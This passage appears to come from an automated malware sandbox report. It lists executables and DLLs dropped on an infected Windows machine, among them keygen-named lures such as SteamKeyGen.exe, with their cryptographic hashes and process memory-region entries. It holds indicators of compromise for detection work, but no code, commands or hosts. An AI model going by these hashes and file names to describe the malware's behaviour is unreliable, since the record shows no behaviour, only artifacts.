| SHA1 | f2aa71f4271b7a9b4d6d5da3f786d2b81feeb386 |
| SHA256 | a0e6d2ac49244fcde46fdef8f4f4aefdcdd1298938649d4ff3caafafd5543397 |
| SHA512 | ffff590199d3a8ca81716bdfda68d0235586a0b0a2d9a9080ac73ba55d2790dc8c004279a031c01713367958167aac3ef6052be39a8a1abe73ebb5570e64f0f8 |
C:\Users\Admin\AppData\Local\Temp\inst200.exe
| MD5 | 1a7a8ed87d1e7a36fbbf15dbfa6fbb54 |
| SHA1 | f2aa71f4271b7a9b4d6d5da3f786d2b81feeb386 |
| SHA256 | a0e6d2ac49244fcde46fdef8f4f4aefdcdd1298938649d4ff3caafafd5543397 |
| SHA512 | ffff590199d3a8ca81716bdfda68d0235586a0b0a2d9a9080ac73ba55d2790dc8c004279a031c01713367958167aac3ef6052be39a8a1abe73ebb5570e64f0f8 |
memory/4924-260-0x0000000000160000-0x000000000053B000-memory.dmp
memory/4924-257-0x0000000000160000-0x000000000053B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tvstream22.exe
| MD5 | 2973af2b241aeced0f58d627b9b64389 |
| SHA1 | 17a5bad765b78fe1f8ca42452a7c570b8c1d7d84 |
| SHA256 | 36a98b7bcf2e6f3a6d79bbf3abe89c65c4d5f5b333cd5c7031089db0112709ec |
| SHA512 | 766eda9cce97b96b6a7462bfca13a859605c9abb9f62b6c080c8105138844abd41701900aafd5ba9b155333dec0a8171a790543cda7f6a1f945005d0ad412e39 |
memory/4924-244-0x0000000000160000-0x000000000053B000-memory.dmp
memory/4992-265-0x0000000000570000-0x0000000000579000-memory.dmp
memory/4992-266-0x00000000007A0000-0x00000000007AD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-ES0TD.tmp\idp.dll
| MD5 | 55c310c0319260d798757557ab3bf636 |
| SHA1 | 0892eb7ed31d8bb20a56c6835990749011a2d8de |
| SHA256 | 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed |
| SHA512 | e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57 |
memory/4452-268-0x0000000000000000-mapping.dmp
memory/5052-271-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 305258d85319c7ebc85dd6f9df4c767b |
| SHA1 | 4b8d266f9adcb70d2396cd1c91f96862dc6478c8 |
| SHA256 | 21051ebd0c936628c01fa42159a3bccb0eeeaf474981e3410319318c001b92e7 |
| SHA512 | a38ea6613290b18fd9650aa31c49e149c0e06b31a070dc9310a2e5f98d41833c352fe63fd827809b02236a967b862733d70b3af5194d1a8150188f1d7dfc73f4 |
C:\Users\Admin\AppData\Local\Temp\udontsay.exe
| MD5 | d330b06e5db0d2762afc840106a3c453 |
| SHA1 | 02a94a31cb7fa526dbbcf0998bb5759b5abda55e |
| SHA256 | adb97599b86196b2a2e47cbcd4eb605f11d809674678da2be9ff1f425c3f2653 |
| SHA512 | bd0f8193d133a4b71cf21e5e5b7688d5dd6795a42d9f795a036a79e47599f8d2c1836874001a27dac57946b5cabdffd402d5101a5197b28f810bdfc40cc62344 |
memory/4408-281-0x0000000000000000-mapping.dmp
memory/4408-289-0x0000000000830000-0x0000000000850000-memory.dmp
C:\Users\Public\SteamKeyNeg.exe
| MD5 | 64eeb5ab677596ec8516a8414428b5d7 |
| SHA1 | 4c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a |
| SHA256 | 2ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3 |
| SHA512 | 16012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439 |
memory/1420-294-0x0000000000000000-mapping.dmp
memory/4288-293-0x0000000000C60000-0x0000000000D35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp
| MD5 | 127ff88c447a99fca6c0907f27e61ca1 |
| SHA1 | a57cf8ca347f1bb6767bc4f0b10b1fbccb315f46 |
| SHA256 | 7de9e69ff6305c9e2b52f05f365eb775521502dbccac937842725cc0e8972e0a |
| SHA512 | 9aa052473b0717c795585031baa0fcbabd71a89b3fc7eb8e0a66f3f94f582394ca57ee52e7fb23b5b31831036870c64929ab2c50c255498a0193064a83ec1471 |
memory/1836-298-0x0000000000000000-mapping.dmp
memory/4288-295-0x0000000001000000-0x0000000001001000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
| MD5 | 18c89c072929521e7fa99f0881f4d553 |
| SHA1 | 9c75dba87aee774c7c2c4586227aea5b3eaa44e4 |
| SHA256 | 60f9d34b4f1fda5196c7fb14c5077c8053eb2b98721caccd16ed7a933913157d |
| SHA512 | 5e11bfe8ce9a54ff4a5acf1d289b2e603978bc5ebcada1e192b04095820d35381100f04390c1cc9d732f38e38681c47d5c76f398b97efb8df89cef93dd9e653f |
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
| MD5 | 18c89c072929521e7fa99f0881f4d553 |
| SHA1 | 9c75dba87aee774c7c2c4586227aea5b3eaa44e4 |
| SHA256 | 60f9d34b4f1fda5196c7fb14c5077c8053eb2b98721caccd16ed7a933913157d |
| SHA512 | 5e11bfe8ce9a54ff4a5acf1d289b2e603978bc5ebcada1e192b04095820d35381100f04390c1cc9d732f38e38681c47d5c76f398b97efb8df89cef93dd9e653f |
memory/1836-304-0x0000000000950000-0x0000000000A2E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll
| MD5 | fbe295e5a1acfbd0a6271898f885fe6a |
| SHA1 | d6d205922e61635472efb13c2bb92c9ac6cb96da |
| SHA256 | a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1 |
| SHA512 | 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06 |
memory/4976-307-0x0000000000000000-mapping.dmp
memory/4288-310-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/4408-311-0x0000000005080000-0x0000000005092000-memory.dmp
memory/4408-318-0x00000000051B0000-0x00000000052BA000-memory.dmp
memory/4472-322-0x0000000000000000-mapping.dmp
memory/4408-320-0x00000000050E0000-0x000000000511C000-memory.dmp
memory/4472-326-0x00000000001C0000-0x00000000001C8000-memory.dmp
memory/3140-331-0x0000000000000000-mapping.dmp
memory/2420-332-0x0000000000000000-mapping.dmp
memory/2960-334-0x0000000000400000-0x00000000006BF000-memory.dmp
memory/2420-336-0x0000000000B00000-0x0000000000B08000-memory.dmp
memory/780-340-0x0000000000000000-mapping.dmp
memory/2960-335-0x0000000000020000-0x0000000000023000-memory.dmp
memory/4196-328-0x0000000000000000-mapping.dmp
memory/1688-341-0x0000000000630000-0x0000000000707000-memory.dmp
memory/780-345-0x0000000000880000-0x0000000000888000-memory.dmp
memory/4124-342-0x0000000000000000-mapping.dmp
memory/2516-324-0x0000000000000000-mapping.dmp
memory/1836-317-0x0000000000950000-0x0000000000A2E000-memory.dmp
memory/1688-316-0x0000000000000000-mapping.dmp
memory/3132-315-0x0000000000000000-mapping.dmp
memory/4976-314-0x00000000004B0000-0x00000000004B8000-memory.dmp
memory/4408-309-0x00000000055E0000-0x0000000005BF8000-memory.dmp
memory/4288-306-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/1836-305-0x0000000000A40000-0x0000000000A41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll
| MD5 | fbe295e5a1acfbd0a6271898f885fe6a |
| SHA1 | d6d205922e61635472efb13c2bb92c9ac6cb96da |
| SHA256 | a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1 |
| SHA512 | 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06 |
C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll
| MD5 | fbe295e5a1acfbd0a6271898f885fe6a |
| SHA1 | d6d205922e61635472efb13c2bb92c9ac6cb96da |
| SHA256 | a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1 |
| SHA512 | 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06 |
memory/4288-303-0x0000000076C80000-0x0000000076E95000-memory.dmp
memory/1400-292-0x0000000000000000-mapping.dmp
memory/4288-291-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/2800-290-0x0000000000400000-0x00000000004CC000-memory.dmp
C:\Users\Public\SteamKeyNeg.exe
| MD5 | 64eeb5ab677596ec8516a8414428b5d7 |
| SHA1 | 4c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a |
| SHA256 | 2ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3 |
| SHA512 | 16012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439 |
C:\Users\Admin\AppData\Local\Temp\6AHD0.exe
| MD5 | 5e2b57ba7e724923726235f4bab6dc3a |
| SHA1 | 717d816d000606d9778328d5400cb200d5a32aba |
| SHA256 | ebccec79dade98b555e165fc883e7832fb86a1178e5c9ef807a947a9ce8141de |
| SHA512 | 79efb25d12371af32eda91f5896cca07fb917aa563e951aeb06f223b52ed5d018c31055cf55e73ad32ce821c7d54d8cb695fa5c63ee62b6225f0739d6166523b |
C:\Users\Admin\AppData\Local\Temp\6AHD0.exe
| MD5 | 5e2b57ba7e724923726235f4bab6dc3a |
| SHA1 | 717d816d000606d9778328d5400cb200d5a32aba |
| SHA256 | ebccec79dade98b555e165fc883e7832fb86a1178e5c9ef807a947a9ce8141de |
| SHA512 | 79efb25d12371af32eda91f5896cca07fb917aa563e951aeb06f223b52ed5d018c31055cf55e73ad32ce821c7d54d8cb695fa5c63ee62b6225f0739d6166523b |
memory/1036-347-0x0000000000000000-mapping.dmp
memory/2420-350-0x0000000002CC0000-0x0000000002CC2000-memory.dmp
memory/1036-353-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/2032-356-0x0000000000632000-0x0000000000659000-memory.dmp
memory/4924-357-0x0000000000160000-0x000000000053B000-memory.dmp
memory/1036-360-0x000002D078310000-0x000002D078312000-memory.dmp
memory/2032-361-0x0000000000400000-0x0000000000481000-memory.dmp
memory/4924-363-0x0000000077A40000-0x0000000077BE3000-memory.dmp
memory/4288-364-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/4508-366-0x0000000000000000-mapping.dmp
memory/5052-365-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/4516-359-0x0000000000000000-mapping.dmp
memory/2032-358-0x00000000005C0000-0x0000000000604000-memory.dmp
memory/3176-368-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/3176-369-0x0000000000C40000-0x0000000000C42000-memory.dmp
memory/1036-355-0x000002D0766C0000-0x000002D0766C6000-memory.dmp
memory/1836-371-0x0000000000F00000-0x0000000000F46000-memory.dmp
memory/4288-370-0x0000000002B30000-0x0000000002B76000-memory.dmp
memory/4924-352-0x0000000000B90000-0x0000000000BD4000-memory.dmp
memory/2420-346-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4196-349-0x0000000000660000-0x0000000000700000-memory.dmp
memory/4228-348-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\udontsay.exe
| MD5 | d330b06e5db0d2762afc840106a3c453 |
| SHA1 | 02a94a31cb7fa526dbbcf0998bb5759b5abda55e |
| SHA256 | adb97599b86196b2a2e47cbcd4eb605f11d809674678da2be9ff1f425c3f2653 |
| SHA512 | bd0f8193d133a4b71cf21e5e5b7688d5dd6795a42d9f795a036a79e47599f8d2c1836874001a27dac57946b5cabdffd402d5101a5197b28f810bdfc40cc62344 |
memory/3176-282-0x0000000000710000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nse6079.tmp\nsisdl.dll
| MD5 | ee68463fed225c5c98d800bdbd205598 |
| SHA1 | 306364af624de3028e2078c4d8c234fa497bd723 |
| SHA256 | 419485a096bc7d95f872ed1b9b7b5c537231183d710363beee4d235bb79dbe04 |
| SHA512 | b14fb74cb76b8f4e80fdd75b44adac3605883e2dcdb06b870811759d82fa2ec732cd63301f20a2168d7ad74510f62572818f90038f5116fe19c899eba68a5107 |
memory/4288-280-0x0000000000000000-mapping.dmp
C:\Users\Public\SteamKeyGen.exe
| MD5 | c523d423234494eeb7b60a892d7a4bea |
| SHA1 | db992908237ee2ab5c07f4362b9a29516ac09a5d |
| SHA256 | 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3 |
| SHA512 | 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec |
C:\Users\Public\SteamKeyGen.exe
| MD5 | c523d423234494eeb7b60a892d7a4bea |
| SHA1 | db992908237ee2ab5c07f4362b9a29516ac09a5d |
| SHA256 | 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3 |
| SHA512 | 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec |
memory/5052-275-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/2984-273-0x0000000000000000-mapping.dmp
memory/3176-272-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
| MD5 | 35fcec704d7072157fd5fdc35b543904 |
| SHA1 | 34677f3d61028d45d87b952c9ec1f851729981a9 |
| SHA256 | 9a49d97abc9f621287365999038cf919581abba2d89fcc1daf704bd34b298859 |
| SHA512 | 863500aa8acc3f35ad346b7d2a8037d2b5a40810baee99f0ab7333f6fbdad4234d789a0d857cf884490a2c0b3b87c70318a09b85f762f0b5340f7b2bfaa09197 |
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
| MD5 | 35fcec704d7072157fd5fdc35b543904 |
| SHA1 | 34677f3d61028d45d87b952c9ec1f851729981a9 |
| SHA256 | 9a49d97abc9f621287365999038cf919581abba2d89fcc1daf704bd34b298859 |
| SHA512 | 863500aa8acc3f35ad346b7d2a8037d2b5a40810baee99f0ab7333f6fbdad4234d789a0d857cf884490a2c0b3b87c70318a09b85f762f0b5340f7b2bfaa09197 |
memory/1836-373-0x0000000000950000-0x0000000000A2E000-memory.dmp
memory/4288-372-0x0000000000C60000-0x0000000000D35000-memory.dmp
memory/1836-374-0x0000000000950000-0x0000000000A2E000-memory.dmp
memory/4976-375-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4976-376-0x0000000000D10000-0x0000000000D12000-memory.dmp
memory/1688-378-0x0000000000630000-0x0000000000707000-memory.dmp
memory/5512-379-0x0000000000000000-mapping.dmp
memory/4472-380-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4472-381-0x0000000000940000-0x0000000000942000-memory.dmp
memory/1688-382-0x0000000000630000-0x0000000000707000-memory.dmp
memory/4196-384-0x0000000002E40000-0x0000000002E86000-memory.dmp
memory/4196-385-0x0000000000660000-0x0000000000700000-memory.dmp
memory/4408-386-0x0000000005420000-0x0000000005496000-memory.dmp
memory/780-389-0x0000000002850000-0x0000000002852000-memory.dmp
memory/4196-390-0x00000000064A0000-0x0000000006532000-memory.dmp
memory/5584-391-0x0000000000000000-mapping.dmp
memory/5640-392-0x0000000000000000-mapping.dmp
memory/4196-393-0x0000000006480000-0x000000000648A000-memory.dmp
memory/780-388-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp
memory/4196-387-0x0000000006960000-0x0000000006F04000-memory.dmp
memory/5552-383-0x0000000000000000-mapping.dmp
memory/5808-394-0x0000000000000000-mapping.dmp
memory/1688-377-0x0000000002C80000-0x0000000002CC6000-memory.dmp
memory/5892-395-0x0000000000000000-mapping.dmp
memory/4452-396-0x0000000002412000-0x00000000026DB000-memory.dmp
memory/4452-397-0x00000000026E0000-0x00000000029CC000-memory.dmp
memory/1688-398-0x0000000008A60000-0x0000000008AC6000-memory.dmp
memory/1836-399-0x0000000006A40000-0x0000000006A5E000-memory.dmp
memory/5160-400-0x0000000000000000-mapping.dmp
memory/1972-403-0x0000000000000000-mapping.dmp
memory/5360-404-0x0000000000000000-mapping.dmp
memory/5628-405-0x0000000000000000-mapping.dmp
memory/1688-408-0x0000000009870000-0x0000000009A32000-memory.dmp
memory/4408-407-0x0000000006A30000-0x0000000006A80000-memory.dmp
memory/5728-406-0x0000000000000000-mapping.dmp
memory/5800-411-0x0000000000000000-mapping.dmp
memory/6024-413-0x0000000000000000-mapping.dmp
memory/2436-415-0x0000000000000000-mapping.dmp